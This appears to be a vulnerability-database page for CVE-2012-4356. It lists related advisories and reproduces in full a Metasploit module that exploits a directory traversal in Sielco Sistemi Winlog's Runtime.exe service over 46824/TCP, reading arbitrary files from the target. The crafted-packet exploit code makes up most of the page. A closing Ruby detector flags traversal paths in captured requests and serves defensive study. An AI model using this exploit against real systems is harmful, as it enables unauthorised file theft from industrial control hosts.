| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2012-4356 | 27 Jun 2012 00:00 | – | circl |
| CVE-2012-4356 | 19 Aug 2012 20:00 | – | cve |
| CVE-2012-4356 | 19 Aug 2012 20:00 | – | cvelist |
| Sielco Sistemi Winlog Multiple Vulnerabilities | 4 May 2012 06:00 | – | ics |
| Sielco Sistemi Winlog Remote File Access | 12 Jul 2012 11:12 | – | metasploit |
| CVE-2012-4356 | 19 Aug 2012 20:55 | – | nvd |
| Sielco Sistemi Winlog Multiple Vulnerabilities | 28 Jun 2012 00:00 | – | openvas |
| Directory traversal | 19 Aug 2012 20:55 | – | prion |
| CVE-2012-4356 | 22 May 2025 02:14 | – | redhatcve |
| Sielco Sistemi Winlog < 2.07.17 Multiple Vulnerabilities | 10 Sep 2012 00:00 | – | nessus |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sielco Sistemi Winlog Remote File Access',
      'Description'    => %q{
          This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability
        exists in the Runtime.exe service and can be triggered by sending a specially crafted packet
        to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite
        2.07.14.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-4356' ],
          [ 'OSVDB', '83275' ],
          [ 'BID', '54212' ],
          [ 'EDB', '19409'],
          [ 'URL', 'http://aluigi.altervista.org/adv/winlog_2-adv.txt' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(46824),
        OptString.new('FILEPATH', [true, 'The name of the file to download', '/WINDOWS/system32/drivers/etc/hosts']),
        OptInt.new('DEPTH', [true, 'Traversal depth', 10])
      ])
  end

  def run_host(ip)
    # No point to continue if no filename is specified
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
      print_error("#{ip}:#{rport} - Please supply the name of the file you want to download")
      return
    end

    travs = "../" * datastore['DEPTH']
    if datastore['FILEPATH'][0] == "/"
      travs << datastore['FILEPATH'][1, datastore['FILEPATH'].length]
    else
      travs << datastore['FILEPATH']
    end

    connect

    # Open File through _TCPIPS_BinOpenFileFP
    packet = "\x00" * 20
    packet << "\x78" # Opcode
    packet << travs # Path traversal
    packet << "\x00"
    sock.put(packet)
    response = sock.get_once(5, 1) || ''
    if response.unpack("C").first != 0x78
      print_error "#{ip}:#{rport} - Error opening file"
      return
    end

    # The stream allows to identify our file since the
    # server could be handling multiple files simultaneously.
    # Since the stream identifier is just an offset in an array
    # of opened streams it could be used to guess other files
    # opened by the server and stole them :-) just an idea....
    stream = response[1, 4]

    # Get File Length through _TCPIPS_BinGetFileSizeFP
    packet = "\x00" * 20
    packet << "\x79" # Opcode
    packet << stream # stream
    packet << "\x00" * 7
    sock.put(packet)
    response = sock.get_once(5, 1) || ''
    if response.unpack("C").first != 0x79
      print_error "#{ip}:#{rport} - Error getting the file length"
      return
    end
    file_length = response[1,4].unpack("V").first

    # Read File with the help of _TCPIPS_BinGetStringRecordFP
    contents = ""
    offset = 0
    while contents.length < file_length
      packet = "\x00" * 20
      packet << "\x98" # Opcode
      packet << [offset].pack("V") # offset (blocks of 0x55)
      packet << stream # stream
      packet << "\x00" * 3
      sock.put(packet)
      response = ""
      while response.length < 0x7ac # Packets of 0x7ac (header (0x9) + block of data (0x7a3))
        response << sock.get_once(0x7ac-response.length, 5) || ''
      end
      if response.unpack("C").first != 0x98
        print_error "#{ip}:#{rport} - Error reading the file, anyway we're going to try to finish"
      end
      if (file_length - contents.length) < response.length - 9
        contents << response[9, file_length - contents.length] # last packet
      else
        contents << response[9, response.length] # no last packet
      end
      offset = offset + 0x17 # 17 blocks in every packet
    end

    # Close File through _TCPIPS_BinCloseFileFP
    packet = "\x00" * 20
    packet << "\x7B"
    packet << "\x00" * 11
    sock.put(packet)
    response = sock.get_once(-1, 1) || ''
    if response.unpack("C").first != 0x7B
      print_error "#{ip}:#{rport} - Error closing file file, anyway we're going to try to finish"
    end

    disconnect

    print_good "#{ip}:#{rport} - File retrieved successfully!"
    fname = File.basename(datastore['FILEPATH'])
    path = store_loot(
      'sielcosistemi.winlog',
      'application/octet-stream',
      ip,
      contents,
      fname,
      datastore['FILEPATH']
    )
    print_status("#{ip}:#{rport} - File saved in: #{path}")
  end
end
```
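For detection on the 46824/TCP service, the request layout visible in the module above (20-byte header, opcode byte, NUL-terminated path for opcode `0x78`) is enough to flag open-file requests whose path leaves its starting directory. This is an added example, not part of the Metasploit module or any Sielco Sistemi code; the function names are hypothetical, the header is treated as opaque, and it assumes legitimate requests use paths relative to the project directory.

```ruby
# Added example (not Metasploit or Winlog code). Layout assumed from the module
# above: 20-byte header (treated as opaque), opcode byte, NUL-terminated path.
HEADER_LEN  = 20
OPCODE_OPEN = 0x78 # _TCPIPS_BinOpenFileFP, per the module's comments

# Returns the requested path for an open-file request, or nil for anything else.
def winlog_open_path(payload)
  data = payload.b
  return nil unless data.bytesize > HEADER_LEN && data.getbyte(HEADER_LEN) == OPCODE_OPEN
  path = data.byteslice(HEADER_LEN + 1, data.bytesize)
  nul = path.index("\x00".b)
  nul ? path[0, nul] : path
end

# True when the path is absolute, drive-qualified, or climbs above its root.
# Assumption: legitimate requests name files relative to the project directory.
def escapes_root?(path)
  norm = path.tr("\\", "/")
  return true if norm.start_with?("/") || norm.match?(/\A[A-Za-z]:/)
  depth = 0
  norm.split("/").each do |seg|
    next if seg.empty? || seg == "."
    if seg == ".."
      depth -= 1
      return true if depth < 0
    else
      depth += 1
    end
  end
  false
end

def suspicious_winlog_request?(payload)
  path = winlog_open_path(payload)
  !path.nil? && escapes_root?(path)
end

# Constructed sample payloads, not captured traffic.
def sample(opcode, body)
  ("\x00" * HEADER_LEN).b + opcode.chr.b + body.b
end

SAMPLES = {
  "climbs out"     => sample(0x78, "../../example.txt\x00"),
  "backslash form" => sample(0x78, "..\\..\\example.txt\x00"),
  "stays inside"   => sample(0x78, "data/../log1.dat\x00"),
  "size request"   => sample(0x79, "\x01\x00\x00\x00" + "\x00" * 7),
}
SAMPLES.each { |name, p| puts format("%-15s %s", name, suspicious_winlog_request?(p)) }
```

Run it over reassembled TCP payloads rather than individual segments, since a request split across packets would otherwise be parsed from the wrong offset.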